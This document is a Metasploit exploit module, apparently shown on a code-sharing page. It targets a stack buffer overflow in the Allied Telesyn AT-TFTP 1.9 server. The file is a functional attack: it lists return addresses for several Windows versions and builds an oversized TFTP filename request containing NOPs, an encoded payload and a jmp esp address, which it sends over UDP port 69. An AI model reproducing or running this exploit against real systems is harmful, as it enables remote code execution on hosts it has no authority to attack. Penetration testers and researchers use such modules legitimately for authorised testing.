Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Allied Telesyn TFTP Server 1.9 Long Filename Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a
16
        request (get/write) for an overly long file name.
17
      },
18
      'Author'         => [ 'aushack' ],
19
      'References'     =>
20
        [
21
          ['CVE', '2006-6184'],
22
          ['OSVDB', '11350'],
23
          ['BID', '21320'],
24
          ['EDB', '2887']
25
        ],
26
      'DefaultOptions' =>
27
        {
28
          'EXITFUNC' => 'process',
29
        },
30
      'Payload'        =>
31
        {
32
          'Space'    => 210,
33
          'BadChars' => "\x00",
34
          'StackAdjustment' => -3500,
35
        },
36
      'Platform'       => 'win',
37
      'Targets'        =>
38
        [
39
        # Patrick - Tested OK w2k sp0, sp4, xp sp 0, xp sp2 - en 2007/08/24
40
          [ 'Windows NT SP4 English',   { 'Ret' => 0x702ea6f7 } ],
41
          [ 'Windows 2000 SP0 English', { 'Ret' => 0x750362c3 } ],
42
          [ 'Windows 2000 SP1 English', { 'Ret' => 0x75031d85 } ],
43
          [ 'Windows 2000 SP2 English', { 'Ret' => 0x7503431b } ],
44
          [ 'Windows 2000 SP3 English', { 'Ret' => 0x74fe1c5a } ],
45
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
46
          [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ],
47
          [ 'Windows XP SP2 English',   { 'Ret' => 0x71ab9372 } ],
48
          [ 'Windows XP SP3 English',   { 'Ret' => 0x7e429353 } ], # ret by c0re
49
          [ 'Windows Server 2003',      { 'Ret' => 0x7c86fed3 } ], # ret donated by securityxxxpert
50
          [ 'Windows Server 2003 SP2',  { 'Ret' => 0x7c86a01b } ], # ret donated by Polar Bear
51
        ],
52
      'Privileged'     => false,
53
      'DisclosureDate' => '2006-11-27'))
54

55
    register_options(
56
      [
57
        Opt::RPORT(69),
58
        Opt::LHOST() # Required for stack offset
59
      ])
60
  end
61

62
  def exploit
63
    connect_udp
64

65
    sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length)
66
    sploit << payload.encoded
67
    sploit << [target['Ret']].pack('V') 	# <-- eip = jmp esp. we control it.
68
    sploit << "\x83\xc4\x28\xc3" 		# <-- esp = add esp 0x28 + retn
69
    sploit << "\x00" + "netascii" + "\x00"
70

71
    udp_sock.put(sploit)
72

73
    disconnect_udp
74
  end
75
end
76

77